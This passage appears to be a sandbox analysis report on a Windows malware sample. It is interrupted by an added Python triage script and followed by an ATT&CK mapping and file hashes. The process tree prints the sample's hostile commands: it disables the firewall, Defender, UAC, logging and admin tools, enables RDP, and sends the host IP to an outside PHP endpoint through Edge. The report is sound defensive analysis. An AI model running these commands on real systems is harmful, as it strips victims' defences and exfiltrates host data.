    netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
    - Modifies Windows Firewall

  C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
    - Modifies Windows Firewall

  C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
    - Modifies Windows Firewall

  C:\Windows\system32\netsh.exe
    netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
    - Modifies Windows Firewall

  C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    - Modifies Windows Firewall

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached" /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f

  C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f

  C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

  C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4

    C:\Windows\system32\ipconfig.exe
      ipconfig
      - Gathers network information

    C:\Windows\system32\findstr.exe
      findstr IPv4

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.107
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d5be46f8,0x7ff9d5be4708,0x7ff9d5be4718

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3016 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15656042232103283870,4898785898321471104,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
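The reg.exe lines above (Control Panel, Explorer, cmd.exe and Registry Editor locked out under HKCU; PowerShell script execution and script-block logging switched off under HKLM; the SafeBoot\Minimal keys overwritten), the `ipconfig | findstr IPv4` step and the Edge launch that hands the sandbox's address 10.127.0.107 to guardar_ip.php are the parts of this tree a responder wants pulled out mechanically. The script below is an added example, not part of the report or of the sample: it tokenises the command lines exactly as listed, checks each `reg add` against a watch-list of policy values, and flags a URL whose query string carries an IPv4 address. The watch-list, the "known-good" restore settings (including EnableLUA = 1, a UAC value not shown in these lines) and the printed `reg delete`/`reg add` rollback strings are the example's own assumptions, not anything the report states.

```python
# Added example: triage the command lines from the report's process tree.
from __future__ import annotations
import re
from collections import namedtuple
from urllib.parse import parse_qs, urlsplit

TOKEN = re.compile(r'"[^"]*"|\S+')
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
HIVES = {"hkey_local_machine": "HKLM", "hkey_current_user": "HKCU"}
SAFEBOOT_PREFIX = "system\\currentcontrolset\\control\\safeboot"
DISCOVERY = {"ipconfig", "whoami", "systeminfo", "hostname"}
# Watch-list (this example's own assumption): policy values a user-mode script should never
# write.  Mapped value = known-good setting to restore; None = the value should not exist.
WATCHED_VALUES = {
    "software\\microsoft\\windows\\currentversion\\policies\\system": {
        "enablelua": "1", "disableregistrytools": None, "disabletaskmgr": None},
    "software\\microsoft\\windows\\currentversion\\policies\\explorer": {
        "nocontrolpanel": None, "noexplorer": None},
    "software\\policies\\microsoft\\windows\\powershell": {
        "enablescripts": None, "executionpolicy": None,
        "enablescriptblocklogging": None, "scriptblocklogging": None},
    "software\\policies\\microsoft\\windows\\system": {"disablecmd": None},
}
# kind: policy_tamper | safeboot_tamper | discovery | exfil; remediation is "" when no
# mechanical rollback is safe.
Finding = namedtuple("Finding", "kind detail remediation")

def tokenize(cmd: str) -> list[str]:
    """Split a Windows command line, keeping quoted arguments whole."""
    return [t.strip('"') for t in TOKEN.findall(cmd)]

def split_key(raw: str) -> tuple[str, str]:
    hive, _, path = raw.partition("\\")
    return HIVES.get(hive.lower(), hive.upper()), path

def parse_reg_add(tokens: list[str]) -> dict | None:
    """{key, name, type, data} for a 'reg add' command line; None for anything else."""
    head = tokens[0].rsplit("\\", 1)[-1].lower()
    if head not in ("reg", "reg.exe") or len(tokens) < 3 or tokens[1].lower() != "add":
        return None
    entry = {"key": tokens[2], "name": None, "type": "REG_SZ", "data": None}
    i = 3
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag == "/ve":
            entry["name"] = ""          # the key's (Default) value
        elif flag in ("/v", "/t", "/d") and i + 1 < len(tokens):
            entry[{"/v": "name", "/t": "type", "/d": "data"}[flag]] = tokens[i + 1]
            i += 1
        i += 1
    return entry

def triage_reg_add(entry: dict) -> Finding | None:
    hive, path = split_key(entry["key"])
    if path.lower().startswith(SAFEBOOT_PREFIX):   # never auto-delete SafeBoot keys
        return Finding("safeboot_tamper", f"{hive}\\{path} (Default) = {entry['data']!r}", "")
    name = entry["name"] or ""
    watched = WATCHED_VALUES.get(path.lower(), {})
    if name.lower() not in watched:
        return None
    good = watched[name.lower()]
    fix = (f'reg delete "{hive}\\{path}" /v {name} /f' if good is None
           else f'reg add "{hive}\\{path}" /v {name} /t {entry["type"]} /d {good} /f')
    return Finding("policy_tamper", f"{hive}\\{path}\\{name} = {entry['data']}", fix)

def triage_url(tokens: list[str]) -> Finding | None:
    """A URL launch whose query string carries an IPv4 address: host data leaving via GET."""
    for tok in (t for t in tokens if t.lower().startswith(("http://", "https://"))):
        parts = urlsplit(tok)
        for key, values in parse_qs(parts.query).items():
            for value in filter(IPV4.match, values):
                return Finding("exfil",
                               f"{parts.hostname}{parts.path} receives host address {value} in parameter {key!r}",
                               f"block {parts.hostname} at egress")
    return None

def triage_discovery(tokens: list[str]) -> Finding | None:
    for tok in tokens:
        exe = tok.rsplit("\\", 1)[-1].lower().removesuffix(".exe")
        if exe in DISCOVERY:
            return Finding("discovery", f"host discovery command: {exe}", "")
    return None

def triage(command_lines: list[str]) -> list[Finding]:
    findings = []
    for tokens in map(tokenize, command_lines):
        if not tokens:
            continue
        entry = parse_reg_add(tokens)
        finding = (triage_reg_add(entry) if entry else None) or triage_url(tokens) or triage_discovery(tokens)
        if finding:
            findings.append(finding)
    return findings

# Command lines copied from the report's process tree (depth markers removed).
SAMPLE = [
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f',
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f',
    r'reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f',
    r'C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.107',
    r'C:\Windows\system32\cmd.exe /c whoami',
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"[{f.kind}] {f.detail}" + (f"  ->  {f.remediation}" if f.remediation else ""))
```

Two caveats when using output like this on a real host. The report lists the commands, not their exit codes: the HKLM writes only take effect if the script was already running elevated, so check the live values before trusting a rollback string. And the SafeBoot findings are deliberately left without a rollback because the right state for those keys comes from a known-good export of the same Windows build, not from a blind `reg delete`.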
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- System Services (1): Service Execution (1)
- Command and Scripting Interpreter (2): PowerShell (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Create or Modify System Process (2): Windows Service (2)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD59be60d1c7db05918d977790c37ffd5d5
SHA140653b45e82ba27cc724d8ba45914c45c8503c9d
SHA2564f50b8ee1676079d53210e20b3a10f8f490cead0dbf9ee02238d7dd317f9cdf5
SHA51215f3ea65119d356a1693747c5631838ec79df11525c0320fb0fb37a92241e8073855ec4f44237dec142fab16b7c375bd76cc9d63471cb10d1003a3136dfe6629
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ea9aa3ce07afc05c5a55a0dc4b8aa259
SHA1173d2d3fdc2e466a05f6f3abf4c600499ecb726c
SHA256143914d5a1e62f4329ce51cd5cf73f3a797af5e15eb52cab7fbb1b34395d342a
SHA512d5738c63312647a49d583770eeb8e6eef54687a3b38843e76e30f5f83b9a3d3eb42fb34615ef38878243f0084d8d4753011db15a0ed422cb36e81e1d4f8c5004
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54158365912175436289496136e7912c2
SHA1813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA51274b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ce4c898f8fc7601e2fbc252fdadb5115
SHA101bf06badc5da353e539c7c07527d30dccc55a91
SHA256bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA51280fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0Filesize
44KB
MD563824a71a00ed81fd38f6be255fc8a7e
SHA1fa3e8bd1ab5c40c460ef92749e4c3633f60d6dd0
SHA256cbabda38d23c0e5b5e50349e00e4e4dc261f90f531100b0b9b78c9b045b74bba
SHA5129249857e1e88d47ae0bc3e862331fb473a8aa0c27311cb62b171af340b97d21e6727ac3bb3589d5ecac4159142c29f96fb8d19c09563d961ceb99008d2054af7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1Filesize
264KB
MD54799fe82b594b04bfd88094bf5a2f9f4
SHA15157a3215683f0144746076e82c6483c95004f49
SHA2563e50847df7025f1a651fe178064c99618a193ff87e9cde19bd7a9ac60537fa45
SHA5120f84d431ac9a907bc5e09f39491c81330244ee75eadb557e72e55d3f027c279da6f867d1add0c32183cd9f09147dd96e3f7308987ac7a471052a6164fc39e045
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3Filesize
4.0MB
MD58cebd8dcf18c86fa1e58edff6616a0e5
SHA194324dc129c519f77e6b671a8cadc572a487998a
SHA2565b6ed02ad2564c85c5f7ce0bdc166b32385cf87aceccc70f1b7d63fb102ad5d2
SHA512d030bf929e31dff89dc00a8bf79b1fd5aaea9091ee3f6f555bf7040697357a842679b0d81733759ec6b565f4cacd1f4798e074ef56dd927825967860ef241e48
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e4339d5560b515fc_0Filesize
12KB
MD5aa4b7ade6722ae2e501cf09cafbed558
SHA1682bc8d738e1f54a7fdcfd0ad937229e3d72dc28
SHA256efc13f834444c8009e5893a07670448ba1d883c0693ac0486d8cd6e6adf35efc
SHA51294fb2451c39bcbe4ab07a17b17a4b9515b9ba8dda27cb6a4c532d249e09b030f21180e0c24b74fb5005ab122dbaad5d6615dd9072f362fbbfea0b682d7c2aa1d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
96B
MD5426547cc28af13318076d5c6981d728f
SHA1bd2eb40dcc2de52b17aac37ffbdfd70d3abc7196
SHA2569d2a193921397e64dbe771656daaa27a098a1d1da0bddfab306e7a415a57561c
SHA512851d7318b56dc3ae5975076199248b3972431876eebd9280f003eafe1fd47bd0beb4a8e8376f4559bb1420d5650440e2ae40392451bad0803d2cfe27d43e4921
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe596da4.TMPFilesize
96B
MD517775f34f6047e340213132f6f776f7e
SHA1665b9276bbe804256e3d000fa15e57e6a4ce2818
SHA256a8e4b42967c629d0ef889866418fc2438f068c2c29b072fc556d65fd59486095
SHA512aef94236e8aad9cd34b07d296192ce563caffeeaa0d68c5377df2b0f15d858bb3d028256716f5ed1e9e8d060f68ad4b96f3524fb51f70144e5c97271d3f1fb21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOGFilesize
322B
MD564e0e9712d064b843dd5dd64c32bf9a9
SHA17f98b2d45556dc5bf098c786ca356d8ed5625a8a
SHA256602e718582115beafb4f94aad2c45d8525d845dddd86c1559ccc3f0b1ee2a415
SHA512a9e058d97bd53d818f980d56a81a701da4cbb5d798436e83404d2e2623c98a6199ca43989ca36ef578653aa883f372f51302982ffccd5767c9d5c112a88b3313
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HistoryFilesize
124KB
MD59426d59ab9f4657a8ae16cca219e2432
SHA122c6cd0cc631bb8a13fb55f05283c07f7bdd0c20
SHA25689787a5e101c652930563fa23f13da2a9485014f75437db622d5bd480504d7d6
SHA5121a7604f3535ff667e502148e7120d756f6cecbbd663bf819287f751892ebe6e3d174f0aaed305c99bb793b856baf3ae07dbd0f33ae09d955e5b57c7fe9df36df
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journalFilesize
28KB
MD5395ba6f68e4e5a82a24be0f0516c3316
SHA1e2a8558f706bfe5230f658261a2278e60b9b11e3
SHA256e8894266982e7d8091897c7a7bc14384e732a8c392b43c554a24d218b3b49493
SHA512db7c12a65dbd81852456355d04b08edce7d7654a9bea896bebec98ef17376567fd24997a145eb7f21e6126686eb4f83ad4d53993f87d5aa0a544bfb08a3ee1d6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOGFilesize
331B
MD507ab06a493c7fe9c0819d5549ed7a6d7
SHA179e0cdca117b7c2ba84e2e931f6e0540163a07e9
SHA2568347da4e6749be9a94c9a69695f6687dd5d7fe759d1f89263cb6cde8a22cee45
SHA51261851d97ca4d31f0662c6df7d687c2a71947bc1d2a36462936a647c69bb72f41da70f0014c510721e0b6a00595ed10919ed95c1f6d3718731db5d01c696b80e2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Action PredictorFilesize
36KB
MD5cf4b0a74bdc68a111bd7ccbd8569daa5
SHA1e567e83b8db5476018dfed63802d0f60690c8139
SHA256f79fc9fca22eace1d33311f380f135b75b30baa639f2d819fa437580ef268b6d
SHA5124ffda967282821d319e22334cc4410eb8883b436654c2ffa65a7a75fdac296a349a672c734e8fed023b9b34d5f17d1af611f81d433108f898459b5ae412dac9f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5c6cc333df6b0d3cea41d36e2e39cfc90
SHA1c126b78ba094987560cf19062ab0a6a7f5eafefb
SHA2562be7b557189f01b0d521eec83f18d259883b447a9605633439072aa37eb8f8c8
SHA5129cce3f40b035baa529784e5afcba802a4902910de9b6342922c9298c067846e277cab2a34256e2fba35ab25543891ae43feff64587b83a422a8725d46bcad127
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD538a4dfa40a31160e5af62b5e1854214c
SHA1184a2cc46351eba0057262ade360b08d5ef69161
SHA2568ef34890c9bf32b02c7b7827239e4cba3957cce8bbfd5c40b177a8eeb9976eb2
SHA5127a2fd853fbe10c0524a7aa005e19c66eca0c5e5645c7a457eee74356b5b83caea581c23d16a1a721ab4137a8f4fb4263644ade4ccac0c8179799b13a210787d9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD57d24319629a141a490f82c08a2a31272
SHA13ff1727c391ee38c4ca128dca6f76ad72ec37f21
SHA2566eba2178231dba9d7559d98c22cd41915e7134b4b6c1841bf9486c169bf4e91b
SHA5127e215a264d69ea85a099b6f0d966a8997c452f2ed99a11eaa9724bdcf026e6687f7e02683b116fc6ea8112d6076bf31889f59611c80a5f8fceb1c49f23c1ff32
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5af07ef9ad8a24a5506017922725df9ba
SHA10dd98ce60e8c61a04b836d4b1428f081d0dc56d8
SHA25611551cd4295d9e908e6609f6adf03ccd0e95f849506ace45449bce7c4cd197f4
SHA51207ed4f736f0676ca15aed5aab549e666987a338efb64b3763d0ca5b3a4f1480dfe1512c82d271c0ea1e4064b669df8f008b5b1f0c2235a79f1df7cb8140ac0e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferredAppsFilesize
33B
MD52b432fef211c69c745aca86de4f8e4ab
SHA14b92da8d4c0188cf2409500adcd2200444a82fcc
SHA25642b55d126d1e640b1ed7a6bdcb9a46c81df461fa7e131f4f8c7108c2c61c14de
SHA512948502de4dc89a7e9d2e1660451fcd0f44fd3816072924a44f145d821d0363233cc92a377dba3a0a9f849e3c17b1893070025c369c8120083a622d025fe1eacf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13360620960277119Filesize
4KB
MD52cb4678f2c5032cae2d6d3dce09c397e
SHA108543758b1f9bc54d90642899878b38e95bb5e0f
